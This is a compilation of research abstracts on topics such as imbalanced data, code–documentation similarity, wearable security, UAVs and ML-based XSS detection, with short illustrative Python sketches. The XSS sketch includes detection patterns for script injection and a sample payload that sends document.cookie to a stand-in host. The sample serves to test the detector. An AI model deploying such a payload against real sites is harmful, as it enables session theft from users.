Survey on highly imbalanced multi-class data
Machine learning technology has a massive impact on society because it offers solutions to many complicated problems such as classification, clustering analysis, and prediction, especially during the COVID-19 pandemic. Data distribution has been an essential aspect of machine learning in providing unbiased solutions. From the earliest literature published on highly imbalanced data until recently, machine learning research has focused mostly on binary classification problems. Research on highly imbalanced multi-class data remains largely unexplored, even as handling Big Data demands better analysis and prediction. This study reviews the models and techniques for handling highly imbalanced multi-class data, along with their strengths, weaknesses, and related domains. Furthermore, the paper uses a statistical method to explore a case study with a severely imbalanced dataset. This article aims to (1) understand the trend of highly imbalanced multi-class data through analysis of the related literature; (2) analyze previous and current methods of handling highly imbalanced multi-class data; and (3) construct a framework for highly imbalanced multi-class data. The chosen highly imbalanced multi-class dataset is also analyzed and adapted to current machine learning methods and techniques, followed by a discussion of open challenges and future directions for highly imbalanced multi-class data. Finally, this paper presents a novel framework for highly imbalanced multi-class data. We hope this research can provide insights into the potential development of better methods or techniques to handle and manipulate highly imbalanced multi-class data.
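To make "highly imbalanced multi-class data" concrete, the sketch below computes an imbalance ratio (largest class count divided by smallest) and inverse-frequency class weights. Both are common heuristics and are not claimed to be the methods reviewed in the survey; the function names and the toy label list are assumptions made for illustration.

```python
from collections import Counter


def imbalance_ratio(labels):
    """Ratio of the largest class count to the smallest class count."""
    counts = Counter(labels)
    return max(counts.values()) / min(counts.values())


def inverse_frequency_weights(labels):
    """Weight each class by n_samples / (n_classes * class_count)."""
    counts = Counter(labels)
    n_samples, n_classes = len(labels), len(counts)
    return {cls: n_samples / (n_classes * cnt) for cls, cnt in counts.items()}


# Toy labels invented for illustration: three classes, heavily skewed.
labels = ["a"] * 90 + ["b"] * 8 + ["c"] * 2

ratio = imbalance_ratio(labels)
weights = inverse_frequency_weights(labels)
print(f"imbalance ratio: {ratio:.1f}")
for cls in sorted(weights):
    print(f"class {cls}: weight {weights[cls]:.3f}")
```

Weights of this kind are typically passed to a classifier's loss so that errors on rare classes cost more; whether that helps depends on the dataset and the model.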
Text Similarity Between Concepts Extracted from Source Code and Documentation
Context: Constant evolution in software systems often results in their documentation losing sync with the content of the source code. The traceability research field has often helped in the past by recovering links between code and documentation when the two fell out of sync. Objective: The aim of this paper is to compare the concepts contained within the source code of a system with those extracted from its documentation, in order to detect how similar these two sets are. If vastly different, the difference between the two sets might indicate a considerable ageing of the documentation, and a need to update it. Methods: In this paper we reduce the source code of 50 software systems to sets of key terms, each containing the concepts of one of the systems sampled. At the same time, we reduce the documentation of each system to another set of key terms. We then use four different approaches for set comparison to detect how similar the sets are. Results: Using the well-known Jaccard index as the benchmark for the comparisons, we have discovered that the cosine distance has excellent comparative powers, depending on the pre-training of the machine learning model. In particular, the SpaCy and the FastText embeddings offer up to 80% and 90% similarity scores. Conclusion: For most of the sampled systems, the source code and the documentation tend to contain very similar concepts. Given the accuracy of one pre-trained model (e.g., FastText), it also becomes evident that a few systems show a measurable drift between the concepts contained in the documentation and in the source code.
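The two comparison measures named in the abstract can be sketched as follows. This is a minimal illustration, not the paper's pipeline: it computes the Jaccard index on term sets and cosine similarity (one minus the cosine distance) on raw term counts, whereas the paper relies on pre-trained SpaCy and FastText embeddings. The key-term lists are hypothetical.

```python
import math
from collections import Counter


def jaccard_index(a: set, b: set) -> float:
    """Size of the intersection divided by the size of the union."""
    if not a and not b:
        return 1.0  # convention chosen here: two empty sets count as identical
    return len(a & b) / len(a | b)


def cosine_similarity(a: Counter, b: Counter) -> float:
    """Cosine of the angle between two term-count vectors."""
    dot = sum(a[t] * b[t] for t in a.keys() & b.keys())
    norm_a = math.sqrt(sum(v * v for v in a.values()))
    norm_b = math.sqrt(sum(v * v for v in b.values()))
    if norm_a == 0 or norm_b == 0:
        return 0.0
    return dot / (norm_a * norm_b)


# Hypothetical key terms, invented for illustration only.
code_terms = ["parser", "token", "cache", "token", "buffer"]
doc_terms = ["parser", "token", "install", "cache"]

jaccard = jaccard_index(set(code_terms), set(doc_terms))
cosine = cosine_similarity(Counter(code_terms), Counter(doc_terms))
print(f"Jaccard index:     {jaccard:.3f}")
print(f"Cosine similarity: {cosine:.3f}")
```

The Jaccard index only sees exact term overlap, so synonyms count as mismatches; embedding-based cosine measures can score related terms as close, which may explain why results depend on the pre-trained model.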
Security Issues of Mobile and Smart Wearable Devices
Mobile and smart devices (ranging from popular smartphones and tablets to wearable fitness trackers equipped with sensing, computing and networking capabilities) have proliferated lately and redefined the way users carry out their day-to-day activities. These devices bring immense benefits to society and boast improved quality of life for users. As mobile and smart technologies become increasingly ubiquitous, the security of these devices becomes more urgent, and users should take precautions to keep their personal information secure. Privacy has also been called into question, as so many mobile and smart devices routinely collect and process huge quantities of data and store them in the cloud. Ensuring confidentiality, integrity, and authenticity of the information is a cybersecurity challenge with no easy solution.
Unfortunately, current security controls have not kept pace with the risks posed by mobile and smart devices, and have proven patently insufficient so far. Thwarting attacks is also a thriving research area with a substantial amount of still unsolved problems. The pervasiveness of smart devices, the growing attack vectors, and the current lack of security call for an effective and efficient way of protecting mobile and smart devices.
This thesis deals with the security problems of mobile and smart devices, providing specific methods for improving current security solutions. Our contributions are grouped into two related areas which present natural intersections and correspond to the two central parts of this document: (1) Tackling Mobile Malware, and (2) Security Analysis on Wearable and Smart Devices.
In the first part of this thesis, we study methods and techniques to assist security analysts to tackle mobile malware and automate the identification of malicious applications.
We make three contributions in tackling mobile malware. First, we introduce a Secure Message Delivery (SMD) protocol for Device-to-Device (D2D) networks, with the primary objective of choosing the most secure path to deliver a message from a sender to a destination in a multi-hop D2D network. Second, we present a survey investigating concrete and relevant questions concerning Android code obfuscation and protection techniques, with the purpose of reviewing code obfuscation and code protection practices. We evaluate the efficacy of existing code de-obfuscation tools in tackling obfuscated Android malware (obfuscation gives attackers the ability to evade detection mechanisms). Finally, we propose a Machine Learning-based detection framework to hunt malicious Android apps by introducing a system that detects and classifies newly-discovered malware through analyzing applications. The proposed system distinguishes different types of malware from each other and helps to better understand how malware can infect devices, the threat level it poses, and how to protect against it. Our system leverages more complete coverage of apps’ behavioral characteristics than the state-of-the-art, integrates the most performant classifier, and utilizes the robustness of extracted features.
The second part of this dissertation conducts an in-depth security analysis of the most popular wearable fitness trackers on the market. Our contributions in this domain are grouped into four parts: First, we analyze the primitives governing the communication between fitness trackers and cloud-based services. In addition, we investigate communication requirements in this setting such as: (i) Data Confidentiality, (ii) Data Integrity, and (iii) Data Authenticity. Second, we show real-world demos of how modern wearable devices are vulnerable to false data injection attacks. We also document the successful injection of falsified data into cloud-based services, where the data appears legitimate to the cloud, to obtain personal benefits. Third, we circumvent the End-to-End protocol encryption implemented in the most advanced and secure fitness trackers (e.g., Fitbit, as the market leader) through hardware-based reverse engineering. Last but not least, we provide guidelines for avoiding similar vulnerabilities in future system designs.
Air Force Institute of Technology Research Report 2014
This report summarizes the research activities of the Air Force Institute of Technology’s Graduate School of Engineering and Management. It describes research interests and faculty expertise; lists student theses/dissertations; identifies research sponsors and contributions; and outlines the procedures for contacting the school. Included in the report are: faculty publications, conference presentations, consultations, and funded research projects. Research was conducted in the areas of Aeronautical and Astronautical Engineering, Electrical Engineering and Electro-Optics, Computer Engineering and Computer Science, Systems Engineering and Management, Operational Sciences, Mathematics, Statistics and Engineering Physics
Selected Papers from the 5th International Electronic Conference on Sensors and Applications
This Special Issue comprises selected papers from the proceedings of the 5th International Electronic Conference on Sensors and Applications, held on 15–30 November 2018, on sciforum.net, an online platform for hosting scholarly e-conferences and discussion groups. In this 5th edition of the electronic conference, contributors were invited to provide papers and presentations from the field of sensors and applications at large, resulting in a wide variety of excellent submissions and topic areas. Papers which attracted the most interest on the web or that provided a particularly innovative contribution were selected for publication in this collection. These peer-reviewed papers are published with the aim of rapid and wide dissemination of research results, developments, and applications. We hope this conference series will grow rapidly in the future and become recognized as a new way and venue by which to (electronically) present new developments related to the field of sensors and their applications
Applied Metaheuristic Computing
For decades, Applied Metaheuristic Computing (AMC) has been a prevailing optimization technique for tackling perplexing engineering and business problems, such as scheduling, routing, ordering, bin packing, assignment, and facility layout planning. This is partly because the classic exact methods are constrained by prior assumptions, and partly because heuristics are problem-dependent and lack generalization. AMC, on the contrary, guides the course of low-level heuristics to search beyond the local optimality that impairs the capability of traditional computation methods. This topic series has collected quality papers proposing cutting-edge methodology and innovative applications which drive the advances of AMC.
Personality Identification from Social Media Using Deep Learning: A Review
Social media helps in sharing ideas and information among people scattered around the world and thus helps in creating communities, groups, and virtual networks. Identification of personality is significant in many types of applications, such as detecting the mental state or character of a person, predicting job satisfaction and professional and personal relationship success, and recommendation systems. Personality is also an important factor in determining individual variation in thoughts, feelings, and conduct systems. According to a 2018 survey of global social media research, there are approximately 3.196 billion social media users worldwide. The numbers are estimated to grow rapidly with the use of mobile smart devices and advancement in technology. Support vector machine (SVM), Naive Bayes (NB), multilayer perceptron neural network, and convolutional neural network (CNN) are some of the machine learning techniques used for personality identification in the literature. This paper presents various studies on identifying the personality of social media users with the help of machine learning approaches, and reviews the recent studies that aimed to predict the personality of online social media (OSM) users.
Collision Avoidance on Unmanned Aerial Vehicles using Deep Neural Networks
Unmanned Aerial Vehicles (UAVs), although hardly a new technology, have recently
gained a prominent role in many industries, being widely used not only among enthusiastic
consumers but also in highly demanding professional situations, and will have a
massive societal impact over the coming years. However, the operation of UAVs is full
of serious safety risks, such as collisions with dynamic obstacles (birds, other UAVs, or
randomly thrown objects). These collision scenarios are complex to analyze in real-time,
sometimes being computationally impossible to solve with existing State of the Art (SoA)
algorithms, making the use of UAVs an operational hazard and therefore significantly reducing
their commercial applicability in urban environments. In this work, a conceptual
framework for both stand-alone and swarm (networked) UAVs is introduced, focusing on
the architectural requirements of the collision avoidance subsystem to achieve acceptable
levels of safety and reliability. First, the SoA principles for collision avoidance against
stationary objects are reviewed. Afterward, a novel image processing approach that uses
deep learning and optical flow is presented. This approach is capable of detecting and
generating escape trajectories against potential collisions with dynamic objects. Finally,
novel combinations of models and algorithms were tested, providing a new approach for
the collision avoidance of UAVs using Deep Neural Networks. The feasibility of the proposed
approach was demonstrated through experimental tests using a UAV, created from
scratch using the framework developed.
Investigating the detection of stored scripting attacks using machine learning
Web applications now play an essential role in our daily lives; through them we can make bank transfers, purchase products and/or make bookings on the Internet. This makes them a target for attackers who will attempt to exploit security vulnerabilities in web applications in order to obtain access to sensitive user information or gain unauthorized privileges. One of the most common attacks aimed at stealing user information is Cross-Site Scripting; this is ranked among the top 10 security vulnerabilities in web applications. Traditional defense systems rely on a signature database describing known attacks; however, XSS attacks written in JavaScript are very variable; they do not exist only in a single form. The most common cause of XSS security vulnerabilities is weakness of verification of the user’s input. This provides the motivation for finding a method for identifying malicious code, written in JavaScript, that an attacker attempts to have executed on the server.
Machine learning has contributed to the security of web applications. Several studies have been conducted in relation to Intrusion Detection Systems (IDS), which detect and prevent attacks against web applications. Cross-Site Scripting is one of the attacks that has been studied using a number of methods: for example, using features to identify obfuscated scripts, using JavaScript keywords, and evaluating machine learning algorithms such as random forest and SVM in terms of detecting attacks against web applications. These studies have achieved highly accurate results by using machine learning to detect XSS attacks. They often attained better results than dynamic and static analysis in terms of acting as a protection layer for web applications.
The present study demonstrates the use of machine learning methods incorporated into a web application at the user input validation stage - prior to the request being passed to the application server. Classifiers are used to prevent persistent or stored XSS attacks, which are caused by malicious code injections via an input point in the web application. This study relies on supervised machine learning and the application of Boolean feature sets, in order to achieve ease and speed of classification. Furthermore, this study examines the use of such methods on two other types of injection attacks: SQL-i and LDAP. Cascading classifiers and ensemble techniques are used to reduce complexity while maintaining accuracy and speed. To understand how a decision is made in the classifier, an approximate Boolean function is extracted, based on techniques that have been employed to extract rules from black box classifiers.
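The idea of Boolean feature sets applied at the input validation stage can be sketched as below. This is an illustration under stated assumptions, not the study's method: the five features and their regular expressions are hypothetical (the abstract does not list the actual feature set), and a simple count threshold stands in for the trained supervised classifiers the study describes.

```python
import re

# Hypothetical Boolean features; the study's real feature set is not given
# in the abstract, so these patterns are assumptions for illustration.
FEATURES = {
    "has_script_tag": re.compile(r"<\s*script", re.IGNORECASE),
    "has_js_uri": re.compile(r"javascript\s*:", re.IGNORECASE),
    "has_event_handler": re.compile(r"\bon\w+\s*=", re.IGNORECASE),
    "has_document_cookie": re.compile(r"document\s*\.\s*cookie", re.IGNORECASE),
    "has_eval_call": re.compile(r"\beval\s*\(", re.IGNORECASE),
}


def extract_features(user_input: str) -> dict:
    """Map an input string to a dict of True/False feature values."""
    return {name: bool(p.search(user_input)) for name, p in FEATURES.items()}


def looks_malicious(user_input: str, threshold: int = 1) -> bool:
    """Stand-in for a trained classifier: flag the input when at least
    `threshold` Boolean features are True."""
    return sum(extract_features(user_input).values()) >= threshold


# Example inputs invented for illustration.
benign = "Great product, arrived on time!"
attack = '<script>new Image().src="http://example.invalid/?c="+document.cookie</script>'

for text in (benign, attack):
    print(looks_malicious(text), extract_features(text))
```

Boolean features are cheap to compute and easy to inspect, which fits the stated goal of fast classification, but hand-written patterns like these can produce false positives (for example, any text containing `only=` triggers the event-handler pattern), so a real deployment would learn the decision rule from labeled data.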